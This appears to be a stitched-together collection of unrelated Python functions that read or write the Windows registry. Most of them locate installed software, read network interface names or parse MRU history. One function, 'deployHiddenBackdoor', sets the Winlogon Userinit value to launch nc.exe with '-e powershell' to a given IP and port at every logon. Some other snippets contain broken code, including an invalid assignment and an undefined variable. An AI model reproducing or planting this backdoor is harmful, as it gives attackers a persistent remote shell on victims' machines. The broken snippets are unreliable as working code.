def getValueFromRegKey(self, key, valueName): """Retrieves a value for a key @param key: The registry key that holds the value to get. The key should include the section. Eg. "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" @type key: string @param valueName: The name of the value to retrieve @type valueName: string @return: A tupple containing the data of the value with the specified name and it's type @rtype: tupple(string, WinRegValueType) """ hkey, key = self._getHiveAndKey(key) aReg = reg.ConnectRegistry(None, hkey) aKey = reg.OpenKey(aReg, key) value, int_type = reg.QueryValueEx(aKey, valueName) return value, WinRegValueType.findByIntegerValue(int_type)
def Wrireferify(): try: keyval = "SOFTWARE\\COMODO\CIS\\Data" reg = _winreg.ConnectRegistry(None, _winreg.HKEY_LOCAL_MACHINE) ok = _winreg.OpenKey(reg, keyval, 0, _winreg.KEY_WOW64_32KEY | _winreg.KEY_READ) val = _winreg.QueryValueEx(ok, "AvDbVersion")[0] print(val) if val == 0 or val == 1: return True else: return False except WindowsError: print("key not found") return False
def get_connecton_name_from_guid(iface_guids): iface_dict = {} reg = wr.ConnectRegistry(None, wr.HKEY_LOCAL_MACHINE) reg_key = wr.OpenKey( reg, r'SYSTEM\CurrentControlSet\Control\Network\{4d36e972-e325-11ce-bfc1-08002be10318}' ) for i in range(len(iface_guids)): try: reg_subkey = wr.OpenKey(reg_key, iface_guids[i] + r'/Connection') iface_dict = [wr.QueryValueEx(reg_subkey, 'Name')[0]] = iface_guids[i] except FileNotFoundError: pass return iface_dict
def get_win32_timezone(): """Attempt to return the "standard name" of the current timezone on a win32 system. @return the standard name of the current win32 timezone, or False if it cannot be found. """ res = False if sys.platform == "win32": try: import winreg hklm = winreg.ConnectRegistry(None,winreg.HKEY_LOCAL_MACHINE) current_tz_key = winreg.OpenKey(hklm, r"SYSTEM\CurrentControlSet\Control\TimeZoneInformation", 0,winreg.KEY_ALL_ACCESS) res = str(winreg.QueryValueEx(current_tz_key,"StandardName")[0]) # [0] is value, [1] is type code winreg.CloseKey(current_tz_key) winreg.CloseKey(hklm) except Exception: pass return res
def _inkscape_default(self): if get_inkscape_path is not None: return get_inkscape_path if sys.platform == "darwin": if os.path.isfile(INKSCAPE_APP): return INKSCAPE_APP if sys.platform == "win32": wr_handle = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) try: rkey = winreg.OpenKey( wr_handle, "SOFTWARE\\Classes\\inkscape.svg\\DefaultIcon") inkscape = winreg.QueryValueEx(rkey, "")[0] except FileNotFoundError: raise FileNotFoundError("Inkscape executable not found") return inkscape return "inkscape"
def findtools(): """Use registry entries to find BI tools.""" reg = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) try: k = winreg.OpenKey( reg, r"SOFTWARE\Wow6432Node\Bohemia Interactive\BinPBO Personal Edition" ) binpbo_path = winreg.EnumValue(k, 0)[1] binpbo_path = os.path.join(binpbo_path, 'BinPBO.exe') winreg.CloseKey(k) except: print("ERROR: Could not find BinPBO. Please reinstall BI Tools!") sys.exit(1) return [binpbo_path]
def WrireRegdelete(): try: keyval="SYSTEM\\comodoinstall" try: reg = _winreg.ConnectRegistry(None, _winreg.HKEY_LOCAL_MACHINE) ok = _winreg.OpenKey(reg,keyval,0,_winreg.KEY_WOW64_32KEY | _winreg.KEY_READ) _winreg.CloseKey(ok) print("key present next delete key") key = _winreg.DeleteKey(_winreg.HKEY_LOCAL_MACHINE,keyval) print("delete key") _winreg.CloseKey(key) except: print("key not found") return True except WindowsError: return False
def setwinreg(): """Write __version__ to windows registry for the PI UpdateFinder.""" if sys.platform not in ('win32', 'cygwin'): return try: import winreg # Python 3 except ImportError: import _winreg as winreg # Python 2 print('Updating Windows registry...') reghandle = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) keyhandle = winreg.CreateKey(reghandle, r'SOFTWARE\PI\PIPython') winreg.SetValueEx(keyhandle, 'KeyValue', None, winreg.REG_SZ, 'PIPython') winreg.SetValueEx(keyhandle, 'Version', None, winreg.REG_SZ, __version__) winreg.SetValueEx(keyhandle, 'Path', None, winreg.REG_SZ, sys.prefix) winreg.CloseKey(keyhandle) winreg.CloseKey(reghandle)
def pull_last_visited_mru(): try: # open the registry registry = winreg.ConnectRegistry(None, winreg.HKEY_CURRENT_USER) # open the OpenSavePidlMRU key key = winreg.OpenKey(registry, lastVisitedMRUpath) returnStr = "***Last Visited Most Recently Used***\n" # Iterate through all subkeys of OpenSavePidlMRU for i in range(0, winreg.QueryInfoKey(key)[1]): value = winreg.EnumValue(key,i)[1].decode("mbcs") returnStr += output_printable(value) return returnStr except Exception as e: print(e)
def reg_hklm(self, key, name): """ Attempts to retrieve a value within the local machine tree stored at the given key and value name. """ self._logger.debug( "Reading %s at %s from the Windows registry", name, key, ) import winreg as wr # for Windows only, pylint: disable=F0401 with wr.ConnectRegistry(None, wr.HKEY_LOCAL_MACHINE) as hklm: with wr.OpenKey(hklm, key) as subkey: return wr.QueryValueEx(subkey, name)[0]
def setValueFromRegKey(self, key, valueName, valueData, valueType): """Sets a value in a key @param key: The registry key that holds the value to set. If the key does not exist, it will be created. The key should include the section. Eg. "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" @type key: string @param valueName: The name of the value to set @type valueName: string @param valueData: The data to assign to the value @type valueData: string @param valueType: The type of the value @type valueType: WinRegValueType """ hkey, key = self._getHiveAndKey(key) aReg = reg.ConnectRegistry(None, hkey) aKey = reg.CreateKey(aReg, key) reg.SetValueEx(aKey, valueName, 0, valueType.type, valueData)
def getAcro(): key = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) try: thePath = winreg.QueryValueEx(winreg.OpenKey(key, r'SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Acrobat.exe'),"Path") acro = thePath[0] + 'Acrobat.exe' subprocess.call(acro) print(acro) except: try: thePath = winreg.QueryValueEx(winreg.OpenKey(hKey,r'SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\AcroRd32.exe'),"Path") acro = thePath[0] + 'AcroRd32.exe' print(acro) except: print("Please install Adobe Reader or Acrobat Pro. exit") sys.exit() return acro
def get_login_status(): active_user_hkey = r'SOFTWARE\Valve\Steam\ActiveProcess' a_reg = winreg.ConnectRegistry(None, winreg.HKEY_CURRENT_USER) active_process_data = winreg.OpenKey(a_reg, active_user_hkey) active_user_id = winreg.EnumValue(active_process_data, 4)[1] if active_user_id == 0: print('No user logged in, get user login') return False else: print('User is logged in, continue') return True
def _getInstalledProgramsWin(hive, flag): registry = winreg.ConnectRegistry(None, hive) registry_key = winreg.OpenKey( registry, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall", 0, winreg.KEY_READ | flag) registry_subkeys_number = winreg.QueryInfoKey(registry_key)[0] software_list = [] for i in range(registry_subkeys_number): try: asubkey_name = winreg.EnumKey(registry_key, i) subkey = winreg.OpenKey(registry_key, asubkey_name) software_name = winreg.QueryValueEx(subkey, "DisplayName")[0] software_list.append(software_name) except EnvironmentError: continue return software_list
def runMruParser(limit): # limit is the limit number of shown executables counter=0 list=["Name in Registry","Command","Count"] access_registry = winreg.ConnectRegistry(None,winreg.HKEY_CURRENT_USER) access_key = winreg.OpenKey(access_registry,r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU") #accessing the key to open the registry directories under values=enumValues(access_key)[::-1] dict=listToDict(list,values) # sort based on the MRU LIST :HGFEDCBA ALWAYS ??????? # filter the executables to be done for i in range(len(values)): if counter < limit: print("executable {} : {} ".format(i,listToDict(list,values[i]))) counter+=1
def __init__(self, version='4.3', libDir=None): os_type = platform.system() if libDir is None: try: reg = _winreg.ConnectRegistry(None, _winreg.HKEY_LOCAL_MACHINE) key = _winreg.OpenKey(reg, r"SOFTWARE\ViALUX\ALP-" + version) libDir = (_winreg.QueryValueEx( key, "Path"))[0] + "/ALP-{0} API/".format(version) except EnvironmentError: raise ValueError( "Cannot auto detect libDir! Please specify it manually.") if libDir.endswith('/'): libPath = libDir else: libPath = libDir + '/' ## Load the ALP dll if (os_type == 'Windows'): if (ct.sizeof(ct.c_voidp) == 8): ## 64bit libPath += 'x64/' elif not (ct.sizeof(ct.c_voidp) == 4): ## 32bit raise OSError('System not supported.') else: raise OSError('System not supported.') if (version == '4.1'): libPath += 'alpD41.dll' elif (version == '4.2'): libPath += 'alpD41.dll' elif (version == '4.3'): libPath += 'alp4395.dll' print('Loading library: ' + libPath) self._ALPLib = ct.CDLL(libPath) ## Class parameters # ID of the current ALP device self.ALP_ID = ct.c_ulong(0) # Type of DMD found self.DMDType = ct.c_long(0) # Pointer to the last stored image sequence self._lastDDRseq = None # List of all Sequences self.Seqs = []
def GetTnsNamesWindows(): try: import winreg except ImportError: WARNING("winreg not available. Trying _winreg") try: import _winreg as winreg except ImportError: lib_common.ErrorMessageHtml( "No winreg, cannot get tnsnames.ora location") # Tested with package _winreg. aReg = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) try: aKey = winreg.OpenKey(aReg, r"SOFTWARE\Oracle\KEY_XE") # except WindowsError: except Exception: # Probably WindowsError but we must be portable. # The system cannot find the file specified try: # http://stackoverflow.com/questions/9348951/python-winreg-woes # KEY_WOW64_64KEY 64-bit application on the 64-bit registry view. # KEY_WOW64_32KEY 64-bit application on the 32-bit registry view. # Default is ( *,*, 0, winreg.KEY_READ ) aKey = winreg.OpenKey(aReg, r"SOFTWARE\ORACLE\KEY_HOME4", 0, winreg.KEY_READ | winreg.KEY_WOW64_64KEY) except Exception: # Probably WindowsError but we must be portable. exc = sys.exc_info()[1] lib_common.ErrorMessageHtml("Caught %s" % str(exc)) oraHome = None for i in range(1024): try: regVal = winreg.QueryValueEx(aKey, "ORACLE_HOME") oraHome = regVal[0] DEBUG("FindTnsNamesWindows oraHome=%s", str(oraHome)) break except EnvironmentError: break winreg.CloseKey(aKey) winreg.CloseKey(aReg) if oraHome is None: lib_common.ErrorMessageHtml( "No ORACLE_HOME in registry, cannot get tnsnames.ora location") tnsnam = oraHome + "\\network\\ADMIN\\tnsnames.ora" return tnsnam
def findPV(): 'Find Paraview executable in the system. Under Windows (64bit only), this entails searching the registry (see `this post <http://www.paraview.org/pipermail/paraview/2010-August/018645.html>`__); under Linux, look in ``$PATH44 for executable called ``paraview``. Returns ``None`` is Paraview is not found.' import sys, operator if sys.platform == 'win32': # oh gee... # http://www.paraview.org/pipermail/paraview/2010-August/018645.html # - HKEY_CURRENT_USER\SOFTWARE\Wow6432Node\Kitware Inc.\ParaView 3.8.X (64bit machines single user install) # - HKEY_CURRENT_USER\SOFTWARE\Kitware Inc.\ParaView 3.8.X (32bit machines single user install) # - HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Kitware Inc.\ParaView 3.8.X (64bit machines all users) # - HKEY_LOCAL_MACHINE\SOFTWARE\Kitware Inc.\ParaView 3.8.X (32bit machines all users) # # we don't care about 32 bit, do just 64bit import winreg as winreg path = r'SOFTWARE\Wow6432Node\Kitware Inc.' paraviews = [] for reg in (winreg.HKEY_CURRENT_USER, winreg.HKEY_LOCAL_MACHINE): aReg = winreg.ConnectRegistry(None, reg) try: aKey = winreg.OpenKey(aReg, r'SOFTWARE\Wow6432Node\Kitware, Inc.') except WindowsError: continue for i in range(0, winreg.QueryInfoKey(aKey)[0]): keyname = winreg.EnumKey(aKey, i) if not keyname.startswith('ParaView '): # print 'no match:',keyname continue subKey = winreg.OpenKey(aKey, keyname) paraviews.append((keyname, subKey)) # sort lexically using key name and use the last one (highest version) pv = sorted(paraviews, key=operator.itemgetter(1)) if not pv: return None # raise RuntimeError('ParaView installation not found in registry.') pvName, pvKey = pv[-1] pvExec = '' for i in range(0, winreg.QueryInfoKey(pvKey)[1]): key, val, T = winreg.EnumValue(pvKey, i) if key == '': pvExec = val + '/bin/paraview' break if not pvExec: return None # raise RuntimeError('ParaView installation: found in registry, but default key is missing...?') return pvExec else: # on Linux, find it in $PATH import woo.utils return woo.utils.find_executable('paraview')
def _locate_from_registry(): """ Tries to open and read the Tesseract 'Path' registry key. """ result = None try: registry = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) with winreg.OpenKey(registry, _config.winregkey) as key: key_val = winreg.QueryValueEx(key, "Path") result = "{0}\\tesseract.exe".format(key_val[0]) except OSError as e: _warn("_locate_from_registry: Could not open the registry key: " "'{0}'. Error: {1}".format(_config.winregkey, e)) return result
def deployHiddenBackdoor(ip, port): try: print("Trying to deploy a hidden backdoor ...") regHive = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) with winreg.OpenKey( regHive, r"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\winlogon", 0, winreg.KEY_SET_VALUE) as regKey: winreg.SetValueEx( regKey, 'Userinit', 1, winreg.REG_SZ, f"C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe -d {ip} {port} -e powershell,C:\\Windows\\system32\\userinit.exe" ) print("Backdoor deployed successfully!") except OSError: print( "Encountered an error! You don't have the permission to write the registry value" )
def get_steam_dir(): st_dir = None if platform.system() == "Windows": reg = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) try: key = winreg.OpenKey(reg, r"SOFTWARE\Wow6432Node\Valve\Steam") st_dir = winreg.QueryValueEx(key, "InstallPath")[0] except OSError: key = winreg.OpenKey(reg, r"SOFTWARE\Valve\Steam") st_dir = winreg.QueryValueEx(key, "InstallPath")[0] if st_dir is None: config = get_config("steam") if "steam" in config and "dir" in config["steam"]: st_dir = config["dir"] return st_dir
def osmruParser(extension, limit): access_registry = winreg.ConnectRegistry(None, winreg.HKEY_CURRENT_USER) access_key = winreg.OpenKey( access_registry, r"Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU\\" + extension) values = enumValues(access_key, extension) if not limit: # limit is None limit = len(values) if limit > len(values): print("limit exceeds values !!!!!") limit = len(values) for i in range(limit): print("\nFile {} : {} ".format(i, values[i]))
def _inkscape_default(self): if sys.platform == "darwin": if os.path.isfile(INKSCAPE_APP): return INKSCAPE_APP if sys.platform == "win32": wr_handle = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) try: rkey = winreg.OpenKey( wr_handle, "SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\App Paths\\inkscape.exe" ) inkscape = winreg.QueryValueEx(rkey, "")[0] inkscape = '"' + inkscape + '"' except FileNotFoundError: raise FileNotFoundError("Inkscape executable not found") return inkscape return "inkscape"
def _get_pg_config_from_registry(self): try: import winreg except ImportError: import _winreg as winreg reg = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) try: pg_inst_list_key = winreg.OpenKey(reg, 'SOFTWARE\\PostgreSQL\\Installations') except EnvironmentError: # No PostgreSQL installation, as best as we can tell. return None try: # Determine the name of the first subkey, if any: try: first_sub_key_name = winreg.EnumKey(pg_inst_list_key, 0) except EnvironmentError: return None pg_first_inst_key = winreg.OpenKey(reg, 'SOFTWARE\\PostgreSQL\\Installations\\' + first_sub_key_name) try: pg_inst_base_dir = winreg.QueryValueEx( pg_first_inst_key, 'Base Directory')[0] finally: winreg.CloseKey(pg_first_inst_key) finally: winreg.CloseKey(pg_inst_list_key) pg_config_path = os.path.join( pg_inst_base_dir, 'bin', 'pg_config.exe') if not os.path.exists(pg_config_path): return None # Support unicode paths, if this version of Python provides the # necessary infrastructure: if sys.version_info[0] < 3 \ and hasattr(sys, 'getfilesystemencoding'): pg_config_path = pg_config_path.encode( sys.getfilesystemencoding()) return pg_config_path
def int_names( int_guids ): # Looks up the GUID of the network interfaces found in the registry, then converts them into an identifiable format int_names = int_names = ['(unknown)' for i in range(len(int_guids))] reg = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) reg_key = winreg.OpenKey( reg, r'SYSTEM\CurrentControlSet\Control\Network\{4d36e972-e325-11ce-bfc1-08002be10318}' ) for i in range(len(int_guids)): try: reg_subkey = winreg.OpenKey(reg_key, int_guids[i] + r'\Connection') int_names[i] = winreg.QueryValueEx(reg_subkey, 'Name')[0] except FileNotFoundError: pass return int_names
def check_tinc_service(self): rRoot = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) subDir = r'Software\tinc' curpath = os.getcwd() tincbinpath = os.getcwd() + r"\vnet" npcbinpath = curpath + r"\vnet\_npc\npc.exe" tincinscmd = ['sc stop tinc.vnetbridge', 'sc delete tinc.vnetbridge', tincbinpath + r'\tincd.exe -n ' + 'vnetbridge', 'sc stop tinc.vnetbridge', 'sc config tinc.vnetbridge start= demand'] npcinscmd = ['sc stop Npc', npcbinpath + ' install -server=nps.dongbala.top:7088 [email protected]', 'sc config Npc start= demand', 'sc stop Npc'] keyHandle = None try: keyHandle = winreg.OpenKey(rRoot, subDir) except Exception as ex: self._log.error(subDir + " 不存在") if not keyHandle: keyHandle = winreg.CreateKey(rRoot, subDir) if keyHandle: count = winreg.QueryInfoKey(keyHandle)[1] # 获取该目录下所有键的个数(0-下属键个数;1-当前键值个数) if not count: self._log.info("创建 tinc path:: {0}".format(tincbinpath)) winreg.SetValue(rRoot, subDir, winreg.REG_SZ, tincbinpath) for cmd in tincinscmd: os.popen(cmd) time.sleep(0.1) # for cmd in npcinscmd: # os.popen(cmd) # time.sleep(0.1) # ret1 = os.popen('sc qc tinc.vnetbridge|findstr "BINARY_PATH_NAME"').read().strip() # ret2 = os.popen('sc qc npc|findstr "BINARY_PATH_NAME"').read().strip() # print(ret1, '\r\n', ret2) else: name, key_value, value_type = winreg.EnumValue(keyHandle, 0) if tincbinpath not in key_value: self._log.info("修改 tinc path:: {0}".format(tincbinpath)) winreg.SetValue(rRoot, subDir, winreg.REG_SZ, tincbinpath) for cmd in tincinscmd: os.popen(cmd) time.sleep(0.1) try: win32serviceutil.QueryServiceStatus('tinc.vnetbridge') except Exception as ex: for cmd in tincinscmd: os.popen(cmd) time.sleep(0.1)
def _get_card_name_from_reg(self, iface_guids): """ Getting network card name from regedit. """ iface_names = ['(unknown)' for i in range(len(iface_guids))] reg = wr.ConnectRegistry(None, wr.HKEY_LOCAL_MACHINE) reg_key = wr.OpenKey( reg, r'SYSTEM\CurrentControlSet\Control\Network\{4d36e972-e325-11ce-bfc1-08002be10318}' ) for i in range(len(iface_guids)): try: reg_subkey = wr.OpenKey(reg_key, iface_guids[i] + r'\Connection') iface_names[i] = wr.QueryValueEx(reg_subkey, 'Name')[0] except FileNotFoundError: pass return iface_names
def get_reg_item(type_str): reg = wr.ConnectRegistry(None, wr.HKEY_CURRENT_USER) key = None try: key = wr.CreateKey(reg, r"Software\tf\sts") except WindowsError: print("cannot find keys in register") return if key is None: return ret = "0" try: ret = wr.QueryValueEx(key, type_str)[0] except WindowsError: wr.SetValueEx(key, type_str, 0, wr.REG_SZ, "0") wr.CloseKey(key) return ret
def WrireRegcreate(): try: keyval = "SYSTEM\\comodoinstall" try: reg = _winreg.ConnectRegistry(None, _winreg.HKEY_LOCAL_MACHINE) ok = _winreg.OpenKey(reg, keyval, 0, _winreg.KEY_WOW64_32KEY | _winreg.KEY_READ) _winreg.CloseKey(ok) print("Register key is present") except: print("Register key was not found") key = _winreg.CreateKey(_winreg.HKEY_LOCAL_MACHINE, keyval) print("Register key was created") _winreg.CloseKey(key) return True except WindowsError: return False
def _find_matlab_win(): # * Windows: The installed versions of Matlab/MCR are retrieved from the # Windows registry _matdirs = dict() with winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) as aReg: with winreg.OpenKey(aReg, r"SOFTWARE\\MathWorks") as aKey: # R2019a # property_handler for i in range(1024): try: asubkey_name = winreg.EnumKey(aKey, i) if asubkey_name[0] == "R": _matdirs[asubkey_name] = winreg.QueryValue( aKey, asubkey_name + r"\\MATLAB") except EnvironmentError: break return _matdirs[max(list(_matdirs))]